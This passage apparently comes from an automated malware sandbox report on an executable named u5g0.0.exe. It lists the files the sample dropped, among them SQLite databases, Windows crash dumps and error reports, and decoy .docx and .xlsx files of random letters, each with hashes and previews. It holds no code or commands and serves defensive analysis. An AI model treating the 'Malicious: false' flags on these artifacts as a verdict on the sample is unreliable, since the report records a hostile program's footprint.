SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJJJEBFH

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_R0hb7jyBcv.exe_a5f048da7d633f1d02755f37f56d6beff18e56d_230e433d_85a00bb9-205f-404e-b024-213515deefdd\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.083093096435388
Encrypted:	false
SSDEEP:	192:I9u8TsnmIn02Vyjc/jtNWxugCzuiFyZ24IO8/:2snmI02VyjyjYCzuiFyY4IO8/
MD5:	1745D5A560E88E7BCDEF1E9D65777CF0
SHA1:	6B7F8E8C0EF6626D3404640A736ACA5C2B5E6D90
SHA-256:	1D30AEC41836CFC2F65AE379A76C5B75F869A2FE15CD84862A515F552D95E7C3
SHA-512:	7ED2B5DF47114F30D57664DB354D2B886E5735750FBD80C22C0B5A0774D198447C702AB10B4681D21B2B13871683B83B6C50AF921897976D6C17A711048290EC
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.1.3.7.7.7.9.9.8.5.8.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.1.3.7.7.8.5.7.6.7.1.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.5.a.0.0.b.b.9.-.2.0.5.f.-.4.0.4.e.-.b.0.2.4.-.2.1.3.5.1.5.d.e.e.f.d.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.0.8.0.b.1.d.3.-.4.0.0.3.-.4.6.6.5.-.9.3.7.1.-.c.0.7.3.7.4.3.c.d.c.6.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.0.h.b.7.j.y.B.c.v...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.9.0.-.0.0.0.1.-.0.0.1.4.-.9.a.2.6.-.f.9.9.1.f.9.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.9.3.7.0.a.6.6.d.f.4.c.2.e.d.b.2.9.2.1.3.3.a.f.c.3.1.6.e.b.e.8.0.0.0.0.f.f.f.f.!.0.0.0.0.7.2.d.b.7.0.9.2.7.e.2.b.e.7.c.e.0.3.0.e.c.b.8.1.2.b.9.e.a.2.4.1.b.4.6.d.7.a.d.0.!.R.0.h.b.7.j.y.B.c.v...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_u5g0.0.exe_bd391344649266707147ac67cf7cb2db622e1c57_285a76b8_f061121c-63fa-454f-8102-8a04dd9f5552\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.142458788453095
Encrypted:	false
SSDEEP:	192:rybyYi90cpLJjxpZrP2fVHmzuiFyZ24IO8d:WbyYi+cpLJj9KGzuiFyY4IO8d
MD5:	AEC1EF68153F27176A85098FE9B9137A
SHA1:	2B72E6C535C59ADAF6C1586B4FE5E9BEF7C06BB1
SHA-256:	A57620BB000E9D5DADB908C6BDD5CF3CFA6E6621EFEBA3D5D0E3ED2543506B67
SHA-512:	682E5C2E8BDDD14A41A9F47F90B683974398BAFA17F6C3EB9D74175B9EB4C64CC995109D6954C6DBB679B7CEED2CF46AE60A83338B135921D993D899A140732A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.1.3.7.9.8.2.2.6.2.6.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.1.3.7.9.8.6.9.5.0.2.8.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.0.6.1.1.2.1.c.-.6.3.f.a.-.4.5.4.f.-.8.1.0.2.-.8.a.0.4.d.d.9.f.5.5.5.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.f.1.6.8.e.5.1.-.f.6.f.6.-.4.2.1.3.-.8.0.7.c.-.6.5.d.a.7.6.d.7.7.4.b.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.u.5.g.0...0...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.2.0.-.0.0.0.1.-.0.0.1.4.-.f.a.8.b.-.3.6.9.6.f.9.9.6.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.8.c.a.8.5.1.3.a.c.6.d.a.2.a.e.f.b.4.4.c.e.b.7.8.5.0.9.0.8.b.0.0.0.0.f.f.f.f.!.0.0.0.0.5.c.b.8.f.6.2.d.3.6.4.5.8.7.1.1.8.5.1.9.4.6.9.3.1.3.6.e.8.b.d.4.e.b.9.3.1.c.b.5.!.u.5.g.0...0...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1349.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Apr 25 10:16:18 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46240
Entropy (8bit):	2.724866161859164
Encrypted:	false
SSDEEP:	384:C2Fl768+BW8A4HXy81Zu9CyIl9GjBwBBgSC:F74BW8A4HXy81Mk9G9w4SC
MD5:	677F6047E1BA98CFB99BB6BB251183EE
SHA1:	5CBD0E9B0A71715067C8AF2412D91213909B4D03
SHA-256:	D80294C6D1CDC4F2650B16B68E0FC27CDE0260ED3A7880EFD395B7BB92AD8D5C
SHA-512:	DC8913D9E9A5F6752C992590629ECAF5AC5EB045B8359BC233B45474746F0F370FD38316AF954363F3511329DAE9050F77BFE43ED1E759D9C1CD3D37F5A7A9CB
Malicious:	false
Preview:	MDMP..a..... .......r-f............4...........H...H.......d....#......t...D?..........`.......8...........T...........0:..pz...........(.........................................................................................eJ......x+......GenuineIntel............T...........`-*f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1473.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8342
Entropy (8bit):	3.6990852187089858
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+o6Dqge6Y9eSU978JgmfP44uMOpDB89birsflWm:R6lXJZ6DU6YESU97qgmfP44ueiwfd
MD5:	92565E7AA6E8ED9B560F931588CEB234
SHA1:	D34513DDC94F434211C92B03307CC462F1475BE4
SHA-256:	AD0D214E8D83B8CD7599403D938B71DCC0AF1E7C025B5B5107A8687D3BB0F161
SHA-512:	BE42238CCACA4AFF2E2057DBBAC1D1C9A69D65614FC220ECD6C5EB859EBC5CC6728FE05E3DCE2933AAA11C92105AD7D0E7C26670BFC40B2A570A147EB370D63B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.5.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER14A3.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4595
Entropy (8bit):	4.48290401397555
Encrypted:	false
SSDEEP:	48:cvIwWl8zsBNJg77aI9pmWpW8VYV5Ym8M4Jy/FZIRo+q8D9uwiqI7Ld:uIjfBnI7Tn7VjJiso+1ZI7Ld
MD5:	51B38CDBAF66F7B1E37EC6ADCFB4B688
SHA1:	2A3F462C63E6016FA99213A78395E703113E429B
SHA-256:	9CAA287C6637C3D1C1AE21BE6F21CDAF48030A531135354EE4280BE3A166052C
SHA-512:	66F4933E6C523B939DF9880C36528B6DD55D074B843E572751BD53DA234C723A64098440D4F61C898CCA2CC829B0268254D5F11D230F8AE4466977D5637928CA
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295278" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6244.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Apr 25 10:16:38 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	57486
Entropy (8bit):	2.5913735866823444
Encrypted:	false
SSDEEP:	384:U1GCIFG/OQEb/eeE/Cq8m0Nxm5+83Rmj:TCI/QEi/8myEc83o
MD5:	5602A9D35E64655D67A462D7192E639E
SHA1:	AA05DE3E0BC417DB2A7BEE60C45321487C479FDE
SHA-256:	8779380A01B56857F95C5F5EC91AAB03746C2EAD0C2B9684CC06C6D782E913ED
SHA-512:	8FDCF65D35FF1A5389E715199B4D8F8C4DF9DE9BE22FDC4487C150242D872BE221DBD046C2A6F42B0C4A306C35E71C35F866D46D43C7A3C5AF6C05405E150D2A
Malicious:	false
Preview:	MDMP..a..... ........-f............4............ ..<...........v9..........T.......8...........T...........P[..>...........((.........................................................................................eJ.............GenuineIntel............T....... ...g-f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER62F1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6302
Entropy (8bit):	3.7157657696293946
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetbJy6s/nYRAJegaMQUr89bAhsfmjAm:R6l7wVeJJy6UnYRcpDr89bAhsfmjAm
MD5:	F7BA469393867AE42EC85E9CF9A08FB2
SHA1:	CB40EF0E6C4D4174867817162A1B781A8E66A7B5
SHA-256:	AC073323D6B2E8841A1DA062261E3D4F84BEC908E22500019540510A250FF44E
SHA-512:	561F4093E16358AFDF4D2E89960347B1C7FDA0BBC06A852339F606F9A28CA22E55B533452827ED66CFFB67A5C610F53F9F0F3AE10D73B44CBC561485EFFB0C54
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.0.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6311.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4551
Entropy (8bit):	4.431530552583807
Encrypted:	false
SSDEEP:	48:cvIwWl8zsYJg77aI9pmWpW8VYgYm8M4Jpm9R9Fr+q81+ygRQjKO8Sgd:uIjfeI7Tn7VEJ0Tk6QjK3Sgd
MD5:	FB44AC1A17F979845A0BBF084C56D6D3
SHA1:	88A5E31AD52E1A1D50A5811BE83E3425DC3583A2
SHA-256:	8EF9FB743C7941664BEE1CE0C91CD49C962BF0CFA4FE4812DF6F6BB1F456D36B
SHA-512:	52077B33F074D10776F003A80864F0ADFC3F5C70B9D3FBF3548BE6D5FBDC75503824F375E0CFDE6C4E0496326BAED5C181B6AE694686AF1E1899F132D1CB43B8
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="295279" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\SQSJKEBWDT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698473196318807
Encrypted:	false
SSDEEP:	24:yRweZ+GANSA1E8ftV/VhmiY4WFk1Mu7mtKmj1KVVrsfmbG:abZ+X1E8lVNhmNA1P76KmxKamK
MD5:	4D0D308F391353530363283961DF2C54
SHA1:	59DC2A289D6AB91E0CBD287A0F1D47E29BAE0C07
SHA-256:	6D4D77F7AD924168358F449E995C13B1072F06F7D8A464C232E643E2BD4DFF09
SHA-512:	DBF8C59E10706B4E220A6F15ADF4E4BAC5271F9477A5C32F8C61943A0A9318D50AD1A2E00E2BDF49DBA842B603545C49F9C36698802B3CDFE1F51FEC0C214B7A
Malicious:	false
Preview:	SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB

C:\ProgramData\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\ProgramData\VLZDGUKUTZ.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5g0.0.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
